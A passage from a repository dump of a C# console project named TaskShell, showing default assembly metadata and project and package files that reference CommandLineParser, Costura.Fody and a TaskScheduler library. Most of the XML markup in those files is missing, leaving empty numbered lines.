// description, configuration, company, trademark and culture fields are left empty.
[assembly: AssemblyTitle("TaskShell")]
[assembly: AssemblyProduct("TaskShell")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Types in this assembly are hidden from COM by default; set ComVisible(true)
// on an individual type to expose it.
[assembly: ComVisible(false)]

// Typelib ID used if the project is ever exposed to COM.
[assembly: Guid("ab4120bd-140b-41dc-bd9f-33c935f48cfe")]

// Version format is Major.Minor.Build.Revision. Build and Revision can be
// defaulted with '*', e.g. [assembly: AssemblyVersion("1.0.*")].
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/TaskShell/TaskShell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}
9 | Exe
10 | TaskShell
11 | TaskShell
12 | v4.5
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 | AnyCPU
20 | true
21 | full
22 | false
23 | bin\Debug\
24 | DEBUG;TRACE
25 | prompt
26 | 4
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 | ..\packages\CommandLineParser.2.8.0\lib\net45\CommandLine.dll
40 |
41 |
42 | ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
43 |
44 |
45 | ..\packages\TaskScheduler.2.9.0\lib\net40\Microsoft.Win32.TaskScheduler.dll
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
70 |
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/TaskShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------